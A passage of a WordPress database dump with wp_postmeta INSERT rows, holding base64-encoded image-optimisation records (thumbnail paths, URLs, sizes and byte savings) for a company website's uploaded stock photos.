zLCJpZCI6Nzk0fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yODM3OTU0NjktMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjgzNzk1NDY5LTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzI4Mzc5NTQ2OS0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6NDI3LCJ0aW1lIjoxNDgzNTgxNTY3LCJpZCI6Nzk0fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yODM3OTU0NjktMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjgzNzk1NDY5LTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzI4Mzc5NTQ2OS0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6NDkzLCJ0aW1lIjoxNDgzNTgxNTcwLCJpZCI6Nzk0fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yODM3OTU0NjktNTEweDYwMC5qcGciLCJ3aWR0aCI6NTEwLCJoZWlnaHQiOjYwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjgzNzk1NDY5LTUxMHg2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzI4Mzc5NTQ2OS01MTB4NjAwLmpwZyIsInJlZHVjdGlvbiI6NjcyLCJ0aW1lIjoxNDgzNTgxNTc0LCJpZCI6Nzk0fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzI4Mzc5NTQ2OS0xMTR4MTMwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yODM3OTU0NjktMTE0eDEzMC5qcGciLCJ3aWR0aCI6IjExNCIsImhlaWdodCI6IjEzMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjgzNzk1NDY5LTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjo0NTcsInRpbWUiOjE0ODM1ODE1NzcsImlkIjo3OTR9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjgzNzk1NDY5LTE4MHgxODAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzI4Mzc5NTQ2OS0xODB4MTgwLmpwZyIsIndpZHRoIjoiMTgwIiwiaGVpZ2h0IjoiMTgwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yODM3OTU0NjktMTgweDE4MC5qcGciLCJyZWR1Y3Rpb24iOjUyNSwidGltZSI6MTQ4MzU4MTU4MSwiaWQiOjc5NH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yODM3OTU0NjktMjQ3eDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjgzNzk1NDY5LTI0N3gzMDAuanBnIiwid2lkdGgiOiIyNDciLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzI4Mzc5NTQ2OS0yNDd4MzAwLmpwZyIsInJlZHVjdGlvbiI6NjM5LCJ0aW1lIjoxNDgzNTgxNTg0LCJpZCI6Nzk0fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzI4Mzc5NTQ2OS0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yODM3OTU0NjktMzAweDMwMC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjgzNzk1NDY5LTMwMHgzMDAuanBnIiwicmVkdWN0aW9uIjo2NzAsInRpbWUiOjE0ODM1ODE1ODgsImlkIjo3OTR9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjgzNzk1NDY5LTQwMHg0MDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzI4Mzc5NTQ2OS00MDB4NDAwLmpwZyIsIndpZHRoIjoiNDAwIiwiaGVpZ2h0IjoiNDAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yODM3OTU0NjktNDAweDQwMC5qcGciLCJyZWR1Y3Rpb24iOjc2NCwidGltZSI6MTQ4MzU4MTU5MiwiaWQiOjc5NH1d'); 
INSERT INTO `wp_postmeta` VALUES (29966, 793, 'wpfc_optimisation_reduction', '10873'); 
INSERT INTO `wp_postmeta` VALUES (29967, 793, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzIzMDQwNzY0Mi5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yMzA0MDc2NDIuanBnIiwid2lkdGgiOjQyODgsImhlaWdodCI6Mjg0OCwibWltZV90eXBlIjoiIiwiZXJyb3JfY29kZSI6OSwidGltZSI6MTQ4MzU4MTU5NiwiaWQiOiI3OTMifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yMzA0MDc2NDItMzQweDM0MC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjMwNDA3NjQyLTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzIzMDQwNzY0Mi0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6NjgxLCJ0aW1lIjoxNDgzNTgxNjAwLCJpZCI6NzkzfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yMzA0MDc2NDItODAweDUzMS5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjUzMSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjMwNDA3NjQyLTgwMHg1MzEuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzIzMDQwNzY0Mi04MDB4NTMxLmpwZyIsInJlZHVjdGlvbiI6MTAxMiwidGltZSI6MTQ4MzU4MTYwNCwiaWQiOjc5M30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjMwNDA3NjQyLTc2OHg1MTAuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzIzMDQwNzY0Mi03Njh4NTEwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yMzA0MDc2NDItNzY4eDUxMC5qcGciLCJyZWR1Y3Rpb24iOjEwNDAsInRpbWUiOjE0ODM1ODE2MDgsImlkIjo3OTN9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzIzMDQwNzY0Mi0xNjAweDEwNjMuanBnIiwid2lkdGgiOjE2MDAsImhlaWdodCI6MTA2MywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjMwNDA3NjQyLTE2MDB4MTA2My5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjMwNDA3NjQyLTE2MDB4MTA2My5qcGciLCJyZWR1Y3Rpb24iOjE1OTIsInRpbWUiOjE0ODM1ODE2MTMsImlkIjo3OTN9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzIzMDQwNzY0Mi0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yMzA0MDc2NDItMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjMwNDA3NjQyLTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjo2NDEsInRpbWUiOjE0ODM1ODE2MTYsImlkIjo3OTN9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzIzMDQwNzY0Mi0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yMzA0MDc2NDItMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjMwNDA3NjQyLTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjo1MzcsInRpbWUiOjE0ODM1ODE2MjAsImlkIjo3OTN9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzIzMDQwNzY0Mi0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yMzA0MDc2NDItMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjMwNDA3NjQyLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjo2MjUsInRpbWUiOjE0ODM1ODE2MjMsImlkIjo3OTN9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzIzMDQwNzY0Mi01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yMzA0MDc2NDItNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjMwNDA3NjQyLTUxMHg2MDAuanBnIiwicmVkdWN0aW9uIjo3NDAsInRpbWUiOjE0ODM1ODE2MjcsImlkIjo3OTN9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjMwNDA3NjQyLTExNHgxMzAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzIzMDQwNzY0Mi0xMTR4MTMwLmpwZyIsIndpZHRoIjoiMTE0IiwiaGVpZ2h0IjoiMTMwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yMzA0MDc2NDItMTE0eDEzMC5qcGciLCJyZWR1Y3Rpb24iOjU4MywidGltZSI6MTQ4MzU4MTYzMCwiaWQiOjc5M30seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yMzA0MDc2NDItMTgweDE4MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjMwNDA3NjQyLTE4MHgxODAuanBnIiwid2lkdGgiOiIxODAiLCJoZWlnaHQiOiIxODAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzIzMDQwNzY0Mi0xODB4MTgwLmpwZyIsInJlZHVjdGlvbiI6NzMxLCJ0aW1lIjoxNDgzNTgxNjM0LCJpZCI6NzkzfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzIzMDQwNzY0Mi0yNDd4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yMzA0MDc2NDItMjQ3eDMwMC5qcGciLCJ3aWR0aCI6IjI0NyIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjMwNDA3NjQyLTI0N3gzMDAuanBnIiwicmVkdWN0aW9uIjo3OTgsInRpbWUiOjE0ODM1ODE2MzcsImlkIjo3OTN9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjMwNDA3NjQyLTMwMHgzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzIzMDQwNzY0Mi0zMDB4MzAwLmpwZyIsIndpZHRoIjoiMzAwIiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yMzA0MDc2NDItMzAweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjkxMywidGltZSI6MTQ4MzU4MTY0MSwiaWQiOjc5M30seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yMzA0MDc2NDItNDAweDQwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjMwNDA3NjQyLTQwMHg0MDAuanBnIiwid2lkdGgiOiI0MDAiLCJoZWlnaHQiOiI0MDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzIzMDQwNzY0Mi00MDB4NDAwLmpwZyIsInJlZHVjdGlvbiI6OTgwLCJ0aW1lIjoxNDgzNTgxNjQ1LCJpZCI6NzkzfV0='); 
INSERT INTO `wp_postmeta` VALUES (29968, 792, 'wpfc_optimisation_reduction', '12161'); 
INSERT INTO `wp_postmeta` VALUES (29969, 792, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzE0Nzc1MDU0NS5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xNDc3NTA1NDUuanBnIiwid2lkdGgiOjQ5MjgsImhlaWdodCI6MzI2NCwibWltZV90eXBlIjoiIiwiZXJyb3JfY29kZSI6OSwidGltZSI6MTQ4MzU4MTY1MCwiaWQiOiI3OTIifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xNDc3NTA1NDUtMzQweDM0MC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTQ3NzUwNTQ1LTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzE0Nzc1MDU0NS0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6NjI5LCJ0aW1lIjoxNDgzNTgxNjUzLCJpZCI6NzkyfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xNDc3NTA1NDUtODAweDUzMC5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjUzMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTQ3NzUwNTQ1LTgwMHg1MzAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzE0Nzc1MDU0NS04MDB4NTMwLmpwZyIsInJlZHVjdGlvbiI6MTIwMiwidGltZSI6MTQ4MzU4MTY1NywiaWQiOjc5Mn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTQ3NzUwNTQ1LTc2OHg1MDkuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MDksInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzE0Nzc1MDU0NS03Njh4NTA5LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xNDc3NTA1NDUtNzY4eDUwOS5qcGciLCJyZWR1Y3Rpb24iOjExNDksInRpbWUiOjE0ODM1ODE2NjEsImlkIjo3OTJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC